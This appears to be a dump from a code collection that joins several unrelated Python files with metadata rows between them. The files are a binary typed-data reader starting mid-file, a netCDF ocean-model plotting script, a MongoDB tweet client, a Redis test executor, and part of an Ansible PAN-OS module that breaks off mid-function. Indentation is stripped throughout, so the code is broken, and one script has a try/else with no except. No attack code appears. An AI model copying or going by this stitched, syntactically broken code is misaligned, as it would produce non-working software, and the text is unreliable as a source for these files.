def __len__(self):
return self.size
def __call__(self):
o = self.offset
for i in xrange(0, self.size):
tv = self.get(i)
o += self.vlen
yield(tv)
def __getitem__(self, i):
if not isinstance(i, (int,long)):
raise StopIteration
return self.get(i)
def get(self, index):
if index >= self.size:
raise StopIteration
o = self.offset + self.vlen * index
return self.r.read(self.m, o)
class ArrReader:
def __init__(self,renv,ty):
self.nr = UnpackReader('Q',8)
self.r = makeReader(renv,ty)
self.vlen = sizeOf(ty)
def read(self,m,offset):
n=self.nr.read(m,offset)
return ArrReaderGenerator(m, self, n, offset+8)
class NYIReader:
def read(self,m,offset):
raise Exception("nyi")
globalTypeExts={}
def makeCustomReader(name, renv, ty, repty):
mkR = globalTypeExts.get(name)
if (mkR != None):
return mkR(renv, ty, repty)
else:
raise Exception("I don't know how to decode this type: " + str(ty))
def makePrimReader(renv, p):
if (p.name == "unit"):
return UnitReader()
elif (p.name == "bool"):
return UnpackReader('?', 1)
elif (p.name == "char"):
return UnpackReader('c', 1)
elif (p.name == "byte"):
return UnpackReader('B', 1)
elif (p.name == "short"):
return UnpackReader('H', 2)
elif (p.name == "int"):
return UnpackReader('I', 4)
elif (p.name == "long"):
return UnpackReader('Q', 8)
elif (p.name == "float"):
return UnpackReader('f', 4)
elif (p.name == "double"):
return UnpackReader('d', 8)
elif (p.rep != None):
return makeCustomReader(p.name, renv, p, p.rep)
else:
raise Exception("I don't know how to decode the primitive type: " + p.name)
def makeFArrReader(renv,fa):
return FArrReader(renv, fa.ty, fa.tlen.n)
def makeArrReader(renv,a):
if (isinstance(a.ty,Prim) and a.ty.name == "char"):
return StrReader()
else:
return ArrReader(renv,a.ty)
def makeVariantReader(renv,v):
if (len(v.ctors)==2 and v.ctors[0][0] == ".f0" and v.ctors[0][1] == 0 and isinstance(v.ctors[0][2],Prim) and v.ctors[0][2].name == "unit"):
return MaybeReader(renv,v.ctors[1][2])
elif (all(map(lambda c: isinstance(c[2],Prim) and c[2].name=="unit", v.ctors))):
return EnumReader(v.ctors)
else:
return VariantReader(renv,v.ctors)
def makeStructReader(renv,s):
if (len(s.fields) == 0):
return UnitReader()
elif (s.fields[0][0][0] == '.'): # should we read this as a tuple?
return TupleReader(renv, map(lambda f:f[2], s.fields))
else:
return StructReader(renv, map(lambda f:f[0], s.fields), map(lambda f:f[2], s.fields))
def makeAppReader(renv,app):
if (isinstance(app.f,Prim)):
return makeCustomReader(app.f.name, renv, app, evalApp(app.f, app.args))
else:
raise Exception("I don't know how to read '" + str(app) + "'")
class RecReader:
def __init__(self):
self.r = None
def read(self,m,offset):
return self.r.read(m,offset)
def makeRecReader(renv, rec):
o = renv.get(rec.vn)
r = RecReader()
renv[rec.vn] = r
r.r = makeReader(renv, rec.ty)
if (o != None):
renv[rec.vn]=o
else:
renv.pop(rec.vn, None)
return r
def makeVarReader(renv, vn):
if vn in renv:
return renv[vn]
else:
raise Exception("Can't make reader with variable not in environment: " + vn)
def makeReader(renv,ty):
readerDisp = {
"prim": lambda p: makePrimReader(renv, p),
"var": lambda v: makeVarReader(renv, v.name),
"farr": lambda fa: makeFArrReader(renv,fa),
"arr": lambda a: makeArrReader(renv,a),
"variant": lambda v: makeVariantReader(renv,v),
"struct": lambda s: makeStructReader(renv,s),
"long": lambda n: fail("Can't read type-level number: " + str(n.n)),
"app": lambda a: makeAppReader(renv,a),
"rec": lambda r: makeRecReader(renv,r),
"abs": lambda a: fail("Can't read type-level function: " + str(a))
}
return TyCase(readerDisp).apply(ty)
#######
#
# the user interface to structured data
#
#######
def formatRow(cns, cs, r):
s=''
for k in range(len(cs)-1):
s += cs[k][r].ljust(cns[k], ' ')
s += cs[len(cs)-1][r]
return s
def tableFormat(cs):
cns=[]
rc=0
for c in cs:
n = 0
rc = len(c) if rc==0 else min(rc, len(c))
for s in c:
n = max(n, len(s))
cns.append(n)
s = ''
if (rc > 0):
s = formatRow(cns, cs, 0)
for r in range(1, rc):
s += '\n' + formatRow(cns, cs, r)
return s
class FRegion:
def __init__(self, fpath):
self.rep = FREnvelope(fpath)
for vn, bind in self.rep.env.items():
bind.reader = makeReader({}, bind.ty)
@staticmethod
def addType(name, gen):
globalTypeExts[name] = gen
def __str__(self): return self.__repr__()
def __repr__(self):
vns = []
hts = []
tds = []
for vn, bind in self.rep.env.items():
vns.append(vn)
hts.append(' :: ')
tds.append(str(bind.ty))
return tableFormat([vns, hts, tds])
def __getattr__(self, attr):
b = self.rep.env.get(attr, None)
if (b == None):
raise Exception("FRegion has no field named '" + attr + "'")
else:
return b.reader.read(self.rep.m, b.offset)
class FRMeta:
def __init__(self, f): self.f = f
def __repr__(self): return repr(self.f)
def __getattr__(self, attr):
b = self.f.rep.env.get(attr, None)
if (b == None):
raise Exception("FRegion has no field named '" + attr + "'")
else:
return b
def meta(f): return FRMeta(f)
#######
#
# support common "application types" by default
#
#######
def RegReader(desc):
def newCls(cls):
FRegion.addType(desc, lambda renv, ty, repty: cls(renv, ty, repty))
return cls
return newCls
# date/time
@RegReader("datetime")
class DateTimeReader:
def __init__(self, renv, ty, repty):
self.nr = makeReader(renv, repty)
def read(self,m,o):
return datetime.datetime.fromtimestamp(self.nr.read(m,o)/1000000.0)
# file refs (within-file pointer types)
@RegReader("fileref")
class FileRefReader:
def __init__(self,renv,ty,repty):
self.refr = makeReader(renv,repty)
self.r = makeReader(renv,ty.args[0])
def read(self,m,offset):
o=self.refr.read(m,offset)
if (o==0):
return None
else:
return self.r.read(m,o)
# carrays (variable-length arrays stored with a static capacity)
FRegion.addType("carray", lambda renv, ty, repty: makeArrReader(renv, Arr(ty.args[0])))
# darrays (old style variable-length arrays stored with capacity)
@RegReader("darray")
class DArrReader:
def __init__(self,renv,ty,repty):
self.ar = makeArrReader(renv,Arr(ty.args[0]))
def read(self,m,offset):
return self.ar.read(m,offset+8)
# skip-list maps
class SLView:
def __init__(self,sl):
self.sl=sl
@staticmethod
def findNextGLEB(n, level, k):
while (not(n==None)):
sn=n.next[level]
if (sn==None or k < sn.key):
if (level==0):
return n
else:
level=level-1
elif (sn.key <= k):
n = sn
else:
return n
def __getitem__(self,k):
if (self.sl.count==0):
return None
else:
n = SLView.findNextGLEB(self.sl.root, len(self.sl.root.next)-1, k)
if (not(n == None) and n.key==k):
return n.value
else:
return None
def __contains__(self,k):
if (self.sl.count==0):
return False
else:
n=SLView.findNextGLEB(self.sl.root, len(self.sl.root.next)-1, k)
return (not(n==None) and n.key==k)
def __iter__(self):
n=self.sl.root.next[0]
while (not(n==None)):
yield (n.key,n.value)
n=n.next[0]
def __len__(self): return self.sl.count
def __str__(self): return self.__repr__()
def __repr__(self):
ks=[]
eqs=[]
vs=[]
n=self.sl.root().next[0]
while (not(n == None)):
ks.append(str(n.key))
eqs.append(' = ')
vs.append(str(n.value))
n=n.next[0]
return tableFormat([ks,eqs,vs])
@RegReader("slmap")
class SLMapReader:
def __init__(self,renv,ty,repty):
self.sr = makeReader(renv, repty)
def read(self,m,offset):
return SLView(self.sr.read(m,offset))
#uuid
class HobUUID(uuid.UUID):
def __init__(self, *args, **kwargs):
uuid.UUID.__init__(self, *args, **kwargs)
def __str__(self):
return base64.b64encode(self.bytes, '-_')[:-2] + 'A'
@staticmethod
def bytes2uuid(bs):
return HobUUID(bytes=''.join(chr(e) for e in bs))
@RegReader("uuid")
class UuidReader:
def __init__(self, renv, repty, ty):
self.nr = FArrReader(renv, Prim("byte", None), 16)
@LazyRead(True)
def read(self, m, o):
bs = self.nr.read(m,o)
return HobUUID(bytes=''.join(chr(e) for e in bs))
#######
#
# Stored sequences (fseq T n) with representation (^x.(()+((carray T n) * x@?)))@?
#
#######
class RecStream:
def __init__(self, stream):
self.nodes = []
self._reload(stream)
def _reload(self, stream):
self.data = stream
def generate_node(s):
if s[0]:
self.nodes.append(s[0])
if s[1] != None:
generate_node(s[1])
generate_node(stream)
def iter(self):
for nd in self.nodes:
for v in nd():
yield v
def __len__(self):
return sum((len(x) for x in self.nodes))
def __str__(self):
sz = 0
content = ""
for v in self.iter():
sz += 1
if sz > 10:
content += "... ... ..."
break
content += "{}. {}\n".format(sz, v)
return content
def __getitem__(self, i):
c = 0
for nd in self.nodes:
if i >= (c + len(nd)):
c += len(nd)
else:
return nd[i-c]
raise StopIteration
@RegReader("fseq")
class FSeqReader:
def __init__(self, renv, repty, ty):
self.rr = makeReader(renv, ty)
def read(self, m, o):
return RecStream(self.rr.read(m,o))
| apache-2.0 | -8,184,452,706,866,680,000 | 25.073266 | 152 | 0.582207 | false |
tiagoams/blueC_fluxes | int_adv.py | 1 | 2848 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
budget_term_densities
Calculates density maps for nutrient budget terms from NEMO-ERSEM output.
NERC-DEFRA SSB-BlueC projects
Created on Tue Jan 24 09:18:52 2017
@author: TAMS00
"""
#import pandas as pd
import netCDF4
import xarray as xr
import numpy as np
import os
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, cm
import argparse
if (('Windows' in os.environ['OSTYPE']) and
(os.environ['COMPUTERNAME']=='PC4447')):
base='c:/Users/tams00/Documents/nerc_ssb/c_fluxes/AMM7-HINDCAST-v0-erosion'
else:
base='/nerc/n01/n01/momme/AMM7-HINDCAST-v0-erosion'
modelpaths=[os.path.join(base+'/1981/01/','amm7_1d_19810101_19810131_grid_T.nc')]#,
#os.path.join(base+'/1981/02/','amm7_1d_19810201_19810228_grid_T.nc')]
#os.path.join(base+'/1981/01/','restart_trc.nc'),
#modelvars=[['Y4_fdetrc_result']]
#modelvars=[['net_PelBen_POC_result','G3_c_pb_flux','nav_lon','nav_lat'],
#['fabm_st2DnQ1_c','fabm_st2DnQ6_c','fabm_st2DnQ7_c','fabm_st2DnQ17_c','fabm_st2DnH1_c','fabm_st2DnH2_c','fabm_st2DnY2_c','fabm_st2DnY3_c','fabm_st2DnY4_c','fabm_st2DnG3_c'],
#['fabm_st2DnQ1_c','fabm_st2DnQ6_c','fabm_st2DnQ7_c','fabm_st2DnQ17_c','fabm_st2DnH1_c','fabm_st2DnH2_c','fabm_st2DnY2_c','fabm_st2DnY3_c','fabm_st2DnY4_c','fabm_st2DnG3_c']]
par_3d=['TRNO3_c','TRNP1_c','TRNP2_c','TRNP3_c','TRNP4_c','TRNB1_c','TRNZ4_c','TRNZ5_c','TRNZ6_c','TRNR4_c','TRNR6_c','TRNR8_c','TRNR1_c','TRNR2_c','TRNR3_c','TRNL2_c']
par_2d=['fabm_st2DnQ1_c','fabm_st2DnQ6_c','fabm_st2DnQ7_c','fabm_st2DnQ17_c','fabm_st2DnH1_c','fabm_st2DnH2_c','fabm_st2DnY2_c','fabm_st2DnY3_c','fabm_st2DnY4_c','fabm_st2DnG3_c']
adv_3d=['XAD_O3_c_e3t']
modelvars=adv_3d
# main() to take an optional 'argv' argument, which allows us to call it from the interactive Python prompt:
def main(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('--basedir',nargs=1,help='base directory with model files')
args = parser.parse_args()
print(args)
try:
base = args.basedir
else:
base = base
# Naughty datasets might require decode_cf=False
# Here it just needed decode_times=False
print('********************')
print(modelpaths[0])
#data = xr.open_dataset(modelpaths[0],decode_times=False)
modelout = xr.open_mfdataset(modelpaths) #,decode_times=False)
#print(modelout)
for modelvar in modelvars:
vardf=modelout[modelvar]
print(vardf)
# print attributes
for at in vardf.attrs:
print(at+':\t\t',end=' ')
print(vardf.attrs[at])
timeavg=vardf.mean('time_counter')
timeavg.plot()
if __name__ == "__main__":
main()
| gpl-3.0 | 214,627,983,886,993,120 | 32.313253 | 179 | 0.629916 | false |
unibg-gislab/treets | treets/db_client.py | 1 | 5982 | #! /urs/bin/python
# coding: utf8
from __future__ import print_function
import pymongo
from random import uniform
TWEETS_LIMIT = 0
TRACES_LIMIT = 0
class DBClient(object):
'''Docstring for DBClient'''
def __init__(self):
super(DBClient, self).__init__()
self.mongo = pymongo.MongoClient()
self.db = self.mongo.treets
self.db.tweets.create_index('userName')
self.db.users.create_index([('userName', 'text')])
self.db.tweets.create_index([('textMessage', 'text')])
self.db.tweets.ensure_index([('location', pymongo.GEOSPHERE)])
#self.users = self.tweets.distinct('userName')[:limit]
def setup_db(self):
self.create_locations()
self.check_text_index()
self.create_users_collection()
self.remove_users_and_tweets(100)
def remove_users_and_tweets(self, threshold_max, threshold_min=1):
found = self.db.users.find( { '$where': 'this.tweetsIds.length >' + str(threshold_max) })
for u in found:
self.db.tweets.remove({'_id': {'$in': u['tweetsIds']}})
self.db.users.remove( u )
def create_users_collection(self):
self.db.users.remove()
users = self.db.tweets.distinct('userName')
users_coll = []
for u in users:
user = {}
user['userName'] = u
user['tweetsIds'] = self.db.tweets.find({'userName': u}).distinct('_id')
users_coll.append(user)
self.db.users.insert(users_coll)
def create_locations(self):
print('creating locations for geo-indexing, this may take a while')
for t in self.db.tweets.find():
coords = t['geo']
t['location'] = {'type': 'Point', 'coordinates': coords[::-1]}
self.db.tweets.save(t)
self.db.tweets.ensure_index([('location', pymongo.GEOSPHERE)])
def check_text_index(self):
try:
self.db.tweets.create_index([('textMessage', 'text')])
except:
print('converting texts to unicode, this may take a while')
for t in self.db.tweets.find():
t['textMessage'] = unicode(t['textMessage'])
self.db.tweets.save(t)
self.db.tweets.create_index([('textMessage', 'text')])
def get_tweets(self, limit=TWEETS_LIMIT):
'''
Returns first <limit> tweets
'''
return self.db.tweets.find().sort([('_id', -1)]).limit(limit)
def get_random_tweets(self, limit=TWEETS_LIMIT):
'''
returns <limit> random tweets
'''
lenght = self.db.tweets.find().count()
rand = int(uniform(0, 1)*lenght)
return self.db.tweets.find().limit(limit).skip(rand)
def get_tweets_near_point(self, coords, dist, limit=TWEETS_LIMIT):
'''
returns <limit> tweets whithin <dist> meters from coords
'''
return self.db.tweets.find({
'location': {
'$nearSphere': {
'$geometry': {
'type': 'Point', 'coordinates': coords
}, '$maxDistance': dist
}
}
}).sort([('_id', -1)])
def get_tweets_near_point_and_text(self, coords, dist, text, limit=TWEETS_LIMIT):
'''
returns <limit> tweets whithin <dist> meters from coords
'''
return self.db.tweets.find(
{
"$and":
[{"location":{'$geoWithin':{'$centerSphere': [coords,dist/6378.1]}}},
{'$text':{'$search': text}}]
}).sort([('_id', -1)])
def get_tweets_for_text(self, text, limit=TWEETS_LIMIT):
'''
search for tweets containing <text> and returns results
'''
return self.db.tweets.find({'$text': {'$search': text}}).sort([('_id', -1)]).limit(limit)
def get_tweets_for_user(self, user, limit=TWEETS_LIMIT):
'''
returns tweets posted by user
'''
return self.db.tweets.find({'_id': {'$in': user['tweetsIds']}})
#return self.db.tweets.find({'userName': user}).sort([('_id', -1)]).limit(limit)
def get_tweets_for_user_str(self, username, limit=TWEETS_LIMIT):
user = self.db.users.find_one({'$text': {'$search': username}})
if user:
return [self.get_tweets_for_user(user, limit)]
else:
return []
def get_traces(self, limit=TRACES_LIMIT):
'''
Returns first <limit> lists of tweets from the same users
'''
users = self.db.users.find().limit(limit)
return [self.get_tweets_for_user(user) for user in users]
def get_traces_near_point(self, coords, dist, limit=TRACES_LIMIT):
'''
TODO docstring
'''
users = self.get_tweets_near_point(coords, dist).distinct('userName')
users_objs = self.db.users.find({'userName': {'$in': users}}).limit(limit)
return [self.get_tweets_for_user(user) for user in users_objs]
def get_traces_near_point_and_text(self, coords, dist, text, limit=TRACES_LIMIT):
'''
TODO docstring
'''
users = self.get_tweets_near_point_and_text(coords, dist, text).distinct('userName')
users_objs = self.db.users.find({'userName': {'$in': users}}).limit(limit)
return [self.get_tweets_for_user(user) for user in users_objs]
def get_traces_for_text(self, text, limit=TRACES_LIMIT):
'''
TODO docstring
'''
users = self.get_tweets_for_text(text, limit=limit).distinct('userName')
users_objs = self.db.users.find({'userName': {'$in': users}}).limit(limit)
return [self.get_tweets_for_user(user) for user in users_objs]
def get_trace_for_user(self, username):
'''
TODO docstring
'''
return self.get_tweets_for_user_str(username)
if __name__ == '__main__':
client = DBClient()
#client.create_users_collection()
client.remove_users_and_tweets(100, 3)
| mit | -6,620,564,958,461,042,000 | 35.699387 | 97 | 0.564694 | false |
ClearcodeHQ/pytest-redis | src/pytest_redis/executor.py | 1 | 7872 | # Copyright (C) 2017 by Clearcode <http://clearcode.cc>
# and associates (see AUTHORS).
# This file is part of pytest-redis.
# pytest-redis is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# pytest-redis is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with pytest-redis. If not, see <http://www.gnu.org/licenses/>.
"""Redis executor."""
import os
import platform
import re
from collections import namedtuple
from itertools import islice
from pathlib import Path
from tempfile import gettempdir
from typing import Union
from mirakuru import TCPExecutor
from py.path import local
MAX_UNIXSOCKET = 104
if platform.system() == "Linux":
MAX_UNIXSOCKET = 107
def compare_version(version1, version2):
"""
Compare two version numbers.
:param str version1: first version to compare
:param str version2: second version to compare
:rtype: int
:returns: return value is negative if version1 < version2,
zero if version1 == version2
and strictly positive if version1 > version2
"""
def normalize(ver):
return [int(x) for x in re.sub(r"(\.0+)*$", "", ver).split(".")]
def cmp_v(ver1, ver2):
return (ver1 > ver2) - (ver1 < ver2)
return cmp_v(normalize(version1), normalize(version2))
def extract_version(text):
"""
Extract version number from the text.
:param str text: text that contains the version number
:rtype: str
:returns: version number, e.g., "2.4.14"
"""
match_object = re.search(r"\d+(?:\.\d+)+", text)
if match_object:
extracted_version = match_object.group(0)
else:
extracted_version = None
return extracted_version
class RedisUnsupported(Exception):
"""Exception raised when redis<2.6 would be detected."""
class RedisMisconfigured(Exception):
"""Exception raised when the redis_exec points to non existing file."""
class UnixSocketTooLong(Exception):
"""Exception raised when unixsocket path is too long."""
NoopRedis = namedtuple("NoopRedis", "host, port, unixsocket")
class RedisExecutor(TCPExecutor):
"""
Reddis executor.
Extended TCPExecutor to contain all required logic for parametrising
and properly constructing command to start redis-server.
"""
MIN_SUPPORTED_VERSION = "2.6"
"""
Minimum required version of redis that is accepted by pytest-redis.
"""
def __init__(
self,
executable,
databases,
redis_timeout,
loglevel,
host,
port,
timeout=60,
save="",
daemonize="no",
rdbcompression=True,
rdbchecksum=False,
syslog_enabled=False,
appendonly="no",
datadir: Union[local, Path] = None,
): # pylint:disable=too-many-locals
"""
Init method of a RedisExecutor.
:param str executable: path to redis-server
:param int databases: number of databases
:param int redis_timeout: client's connection timeout
:param str loglevel: redis log verbosity level
:param str host: server's host
:param int port: server's port
:param int timeout: executor's timeout for start and stop actions
:param str log_prefix: prefix for log filename
:param str save: redis save configuration setting
:param str daemonize:
:param bool rdbcompression: Compress redis dump files
:param bool rdbchecksum: Whether to add checksum to the rdb files
:param bool syslog_enabled: Whether to enable logging
to the system logger
:param datadir: location where all the process files will be located
:param str appendonly:
"""
if not datadir:
datadir = Path(gettempdir())
self.unixsocket = str(datadir + f"/redis.{port}.sock")
self.executable = executable
logfile_path = datadir / f"redis-server.{port}.log"
pidfile_path = datadir / f"redis-server.{port}.pid"
command = [
self.executable,
"--daemonize",
daemonize,
"--rdbcompression",
self._redis_bool(rdbcompression),
"--rdbchecksum",
self._redis_bool(rdbchecksum),
"--appendonly",
appendonly,
"--databases",
str(databases),
"--timeout",
str(redis_timeout),
"--pidfile",
str(pidfile_path),
"--unixsocket",
self.unixsocket,
"--dbfilename",
f"dump.{port}.rdb",
"--logfile",
str(logfile_path),
"--loglevel",
loglevel,
"--syslog-enabled",
self._redis_bool(syslog_enabled),
"--port",
str(port),
"--dir",
str(datadir),
]
if save:
save_parts = save.split()
assert all(
(part.isdigit() for part in save_parts)
), "all save arguments should be numbers"
assert (
len(save_parts) % 2 == 0
), "there should be even number of elements passed to save"
for time, change in zip(islice(save_parts, 0, None, 2), islice(save_parts, 1, None, 2)):
command.extend([f"--save {time} {change}"])
super().__init__(command, host, port, timeout=timeout)
@classmethod
def _redis_bool(cls, value):
"""
Convert the boolean value to redis's yes/no.
:param bool value: boolean value to convert
:returns: yes for True, no for False
:rtype: str
"""
return "yes" if value and value != "no" else "no"
def start(self):
"""Check supported version before starting."""
self._check_unixsocket_length()
self._check_version()
return super().start()
def _check_unixsocket_length(self):
"""Check unixsocket length."""
if len(self.unixsocket) > MAX_UNIXSOCKET:
raise UnixSocketTooLong(
f"Unix Socket path is longer than {MAX_UNIXSOCKET} "
f"allowed on your system: {self.unixsocket}. "
f"It's probably due to the temporary directory configuration. "
f"You can configure that for python by changing TMPDIR envvar, "
f"add for example `--basetemp=/tmp/pytest` to your pytest "
f"command or add `addopts = --basetemp=/tmp/pytest` to your "
f"pytest configuration file."
)
def _check_version(self):
"""Check redises version if it's compatible."""
with os.popen(f"{self.executable} --version") as version_output:
version_string = version_output.read()
if not version_string:
raise RedisMisconfigured(
f"Bad path to redis_exec is given:"
f" {self.executable} not exists or wrong program"
)
redis_version = extract_version(version_string)
cv_result = compare_version(redis_version, self.MIN_SUPPORTED_VERSION)
if redis_version and cv_result < 0:
raise RedisUnsupported(
f"Your version of Redis is not supported. "
f"Consider updating to Redis {self.MIN_SUPPORTED_VERSION} at least. "
f"The currently installed version of Redis: {redis_version}."
)
| lgpl-3.0 | -2,153,815,324,643,324,000 | 32.21519 | 100 | 0.605183 | false |
PaloAltoNetworks-BD/ansible-pan | library/panos_object.py | 1 | 17603 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: panos_object
short_description: create/read/update/delete object in PAN-OS or Panorama
description:
- Policy objects form the match criteria for policy rules and many other functions in PAN-OS. These may include
- address object, address groups, service objects, service groups, and tag.
author: "Bob Hagen (@rnh556)"
version_added: "2.4"
requirements:
- pan-python can be obtained from PyPI U(https://pypi.python.org/pypi/pan-python)
- pandevice can be obtained from PyPI U(https://pypi.python.org/pypi/pandevice)
deprecated:
removed_in: "2.9"
why: Updated to idempotent modules
alternative: >
Use M(panos_address_object), M(panos_address_group),
M(panos_service_object), M(panos_service_group), or
M(panos_tag_object) as appropriate.
notes:
- Checkmode is not supported.
- Panorama is supported.
options:
ip_address:
description:
- IP address (or hostname) of PAN-OS device or Panorama management console being configured.
required: true
username:
description:
- Username credentials to use for authentication.
required: false
default: "admin"
password:
description:
- Password credentials to use for authentication.
required: true
api_key:
description:
- API key that can be used instead of I(username)/I(password) credentials.
operation:
description:
- The operation to be performed. Supported values are I(add)/I(delete)/I(find).
required: true
addressobject:
description:
- The name of the address object.
address:
description:
- The IP address of the host or network in CIDR notation.
address_type:
description:
- The type of address object definition. Valid types are I(ip-netmask) and I(ip-range).
addressgroup:
description:
- A static group of address objects or dynamic address group.
static_value:
description:
- A group of address objects to be used in an addressgroup definition.
dynamic_value:
description:
- The filter match criteria to be used in a dynamic addressgroup definition.
serviceobject:
description:
- The name of the service object.
source_port:
description:
- The source port to be used in a service object definition.
destination_port:
description:
- The destination port to be used in a service object definition.
protocol:
description:
- The IP protocol to be used in a service object definition. Valid values are I(tcp) or I(udp).
servicegroup:
description:
- A group of service objects.
services:
description:
- The group of service objects used in a servicegroup definition.
description:
description:
- The description of the object.
tag_name:
description:
- The name of an object or rule tag.
color:
description: >
- The color of the tag object. Valid values are I(red, green, blue, yellow, copper, orange, purple, gray,
light green, cyan, light gray, blue gray, lime, black, gold, and brown).
vsys:
description:
- The vsys to put the object into.
- Firewall only.
default: "vsys1"
devicegroup:
description:
- The name of the (preexisting) Panorama device group.
- If undefined and ip_address is Panorama, this defaults to shared.
required: false
default: None
commit:
description:
- Commit the config change.
default: False
'''
EXAMPLES = '''
- name: search for shared address object
panos_object:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
operation: 'find'
address: 'DevNet'
- name: create an address group in devicegroup using API key
panos_object:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
operation: 'add'
addressgroup: 'Prod_DB_Svrs'
static_value: ['prod-db1', 'prod-db2', 'prod-db3']
description: 'Production DMZ database servers'
tag_name: 'DMZ'
devicegroup: 'DMZ Firewalls'
- name: create a global service for TCP 3306
panos_object:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
operation: 'add'
serviceobject: 'mysql-3306'
destination_port: '3306'
protocol: 'tcp'
description: 'MySQL on tcp/3306'
- name: create a global tag
panos_object:
ip_address: '{{ ip_address }}'
username: '{{ username }}'
password: '{{ password }}'
operation: 'add'
tag_name: 'ProjectX'
color: 'yellow'
description: 'Associated with Project X'
- name: delete an address object from a devicegroup using API key
panos_object:
ip_address: '{{ ip_address }}'
api_key: '{{ api_key }}'
operation: 'delete'
addressobject: 'Win2K test'
'''
RETURN = '''
# Default return values
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import get_exception
try:
from pan.xapi import PanXapiError
import pandevice
from pandevice.base import PanDevice
from pandevice import panorama
from pandevice import objects
import xmltodict
import json
HAS_LIB = True
except ImportError:
HAS_LIB = False
def get_devicegroup(device, devicegroup):
dg_list = device.refresh_devices()
for group in dg_list:
if isinstance(group, pandevice.panorama.DeviceGroup):
if group.name == devicegroup:
return group
return False
def find_object(device, dev_group, obj_name, obj_type):
# Get the firewall objects
obj_type.refreshall(device)
if isinstance(device, pandevice.firewall.Firewall):
addr = device.find(obj_name, obj_type)
return addr
elif isinstance(device, pandevice.panorama.Panorama):
addr = device.find(obj_name, obj_type)
if addr is None:
if dev_group:
device.add(dev_group)
obj_type.refreshall(dev_group)
addr = dev_group.find(obj_name, obj_type)
return addr
else:
return False
def create_object(**kwargs):
if kwargs['addressobject']:
newobject = objects.AddressObject(
name=kwargs['addressobject'],
value=kwargs['address'],
type=kwargs['address_type'],
description=kwargs['description'],
tag=kwargs['tag_name']
)
if newobject.type and newobject.value:
return newobject
else:
return False
elif kwargs['addressgroup']:
newobject = objects.AddressGroup(
name=kwargs['addressgroup'],
static_value=kwargs['static_value'],
dynamic_value=kwargs['dynamic_value'],
description=kwargs['description'],
tag=kwargs['tag_name']
)
if newobject.static_value or newobject.dynamic_value:
return newobject
else:
return False
elif kwargs['serviceobject']:
newobject = objects.ServiceObject(
name=kwargs['serviceobject'],
protocol=kwargs['protocol'],
source_port=kwargs['source_port'],
destination_port=kwargs['destination_port'],
tag=kwargs['tag_name']
)
if newobject.protocol and newobject.destination_port:
return newobject
else:
return False
elif kwargs['servicegroup']:
newobject = objects.ServiceGroup(
name=kwargs['servicegroup'],
value=kwargs['services'],
tag=kwargs['tag_name']
)
if newobject.value:
return newobject
else:
return False
elif kwargs['tag_name']:
t = objects.Tag
c = t.color_code(kwargs['color'])
newobject = objects.Tag(
name=kwargs['tag_name'],
color=c,
comments=kwargs['description']
)
if newobject.name:
return newobject
else:
return False
else:
return False
def add_object(device, dev_group, new_object):
if dev_group:
dev_group.add(new_object)
else:
device.add(new_object)
new_object.create()
return True
def main():
argument_spec = dict(
ip_address=dict(required=True),
password=dict(no_log=True),
username=dict(default='admin'),
api_key=dict(no_log=True),
operation=dict(required=True, choices=['add', 'update', 'delete', 'find']),
addressobject=dict(default=None),
addressgroup=dict(default=None),
serviceobject=dict(default=None),
servicegroup=dict(default=None),
address=dict(default=None),
address_type=dict(default='ip-netmask', choices=['ip-netmask', 'ip-range', 'fqdn']),
static_value=dict(type='list', default=None),
dynamic_value=dict(default=None),
protocol=dict(default=None, choices=['tcp', 'udp']),
source_port=dict(default=None),
destination_port=dict(default=None),
services=dict(type='list', default=None),
description=dict(default=None),
tag_name=dict(default=None),
color=dict(default=None, choices=['red', 'green', 'blue', 'yellow', 'copper', 'orange', 'purple',
'gray', 'light green', 'cyan', 'light gray', 'blue gray',
'lime', 'black', 'gold', 'brown']),
vsys=dict(default='vsys1'),
devicegroup=dict(default=None),
commit=dict(type='bool', default=False),
)
module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False,
required_one_of=[['api_key', 'password']],
mutually_exclusive=[['addressobject', 'addressgroup',
'serviceobject', 'servicegroup',
'tag_name']]
)
if not HAS_LIB:
module.fail_json(msg='Missing required libraries.')
ip_address = module.params["ip_address"]
password = module.params["password"]
username = module.params['username']
api_key = module.params['api_key']
operation = module.params['operation']
addressobject = module.params['addressobject']
addressgroup = module.params['addressgroup']
serviceobject = module.params['serviceobject']
servicegroup = module.params['servicegroup']
address = module.params['address']
address_type = module.params['address_type']
static_value = module.params['static_value']
dynamic_value = module.params['dynamic_value']
protocol = module.params['protocol']
source_port = module.params['source_port']
destination_port = module.params['destination_port']
services = module.params['services']
description = module.params['description']
tag_name = module.params['tag_name']
color = module.params['color']
vsys = module.params['vsys']
devicegroup = module.params['devicegroup']
commit = module.params['commit']
# Create the device with the appropriate pandevice type
device = PanDevice.create_from_device(ip_address, username, password, api_key=api_key)
# If Panorama, validate the devicegroup
dev_group = None
if hasattr(device, 'refresh_devices'):
# Panorama: set the device group.
if devicegroup == 'shared':
# Device group of None is "shared" scope for Panorama.
devicegroup = None
if devicegroup is not None:
dev_group = get_devicegroup(device, devicegroup)
if dev_group:
device.add(dev_group)
else:
module.fail_json(msg='\'%s\' device group not found in Panorama. Is the name correct?' % devicegroup)
else:
